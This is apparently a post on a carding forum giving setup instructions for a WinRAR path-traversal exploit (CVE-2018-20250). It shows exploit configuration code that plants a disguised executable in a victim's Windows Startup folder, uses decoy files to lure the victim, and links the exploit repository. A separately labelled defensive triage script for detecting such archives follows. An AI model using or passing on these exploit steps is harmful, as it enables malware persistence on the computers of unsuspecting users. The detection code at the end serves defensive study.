Carder.life

WINRAR Exploit - CVE-2018-20250

Elusive 03-19-2025 10:38 PM


How to set up.
Install Python 3.7 and prepare an evil file you want to run, set the values you want, and this exp script will generate the evil archive file automatically!
Set the values you want:
Code:
<pre class="alt2" dir="ltr"># The archive filename you want
rar_filename = "test.rar"
# The evil file you want to run
evil_filename = "calc.exe"
# The decompression path you want, such shown below
target_filename = r"C:\C:C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hi.exe"
# Other files to be displayed when the victim opens the winrar
# filename_list=[]
filename_list = ["hello.txt", "world.txt"]</pre>
Code:
<pre class="alt2" dir="ltr">def get_right_hdr_crc(filename):
    # This command may be different, it depends on the your Python3 environment.
    p = os.popen('py -3 acefile.py --headers %s'%(filename))
    res = p.read()
    pattern = re.compile('right_hdr_crc : 0x(.*?) | struct')
    result = pattern.findall(res)
    right_hdr_crc = result[0].upper()
    return hex2raw4(right_hdr_crc)</pre>
Run the exp, and the exp generates the test.rar automatically.
If the victim opens the test.rar, he will see the files hello.txt and world.txt; you can also add more files, more attractive files.
When he unpacks the file, the victim's user startup directory will have one more file named hi.exe; actually it's a calc.exe. When he restarts the computer, the hi.exe will run.
Needed files:
Code:
<pre class="alt2" dir="ltr">https://github.com/WyAtu/CVE-2018-20250/</pre>
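A defensive triage check for the kind of archive this post describes, added here as an example and not part of the original post or the linked repository: it flags files that carry the ACE magic (`**ACE**` at byte offset 7) under a non-.ace name such as test.rar, and looks for traversal or Startup-folder strings in the raw bytes. The function name `triage_archive` and the sample blob are constructed for illustration, and the scan is a heuristic over raw bytes, not a full ACE header parser.

```python
import re
import sys

ACE_MAGIC = b"**ACE**"       # ACE main-header magic, located at byte offset 7
RAR_MAGIC = b"Rar!\x1a\x07"  # common prefix of the RAR4 and RAR5 signatures

# Strings worth flagging. ACE header filenames are stored uncompressed, so a
# raw byte scan sees them; compressed payload bytes can cause false positives.
SUSPICIOUS = {
    "parent-directory traversal": re.compile(rb"\.\.[\\/]"),
    "Startup folder target": re.compile(rb"Start Menu\\Programs\\Startup", re.I),
}


def triage_archive(name, data):
    """Return a list of findings for one file; an empty list means no flag."""
    findings = []
    if data[7:14] != ACE_MAGIC:
        return findings  # not ACE content (for example a genuine RAR file)
    if not name.lower().endswith(".ace"):
        findings.append("ACE content behind a non-.ace extension")
    for label, rx in SUSPICIOUS.items():
        if rx.search(data):
            findings.append(label)
    return findings


# Constructed sample: NOT a valid archive, only the magic at offset 7 plus the
# target path string quoted in the post, enough to exercise the checks.
SAMPLE = (bytes(7) + ACE_MAGIC + bytes(20) +
          rb"C:\C:C:../AppData\Roaming\Microsoft\Windows"
          rb"\Start Menu\Programs\Startup\hi.exe")

if __name__ == "__main__":
    # Usage: python triage.py file1.rar file2.rar ...  (no args: run on SAMPLE)
    targets = sys.argv[1:]
    if not targets:
        print("test.rar (constructed):", triage_archive("test.rar", SAMPLE))
    for path in targets:
        with open(path, "rb") as fh:
            print(path, triage_archive(path, fh.read()))
```
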

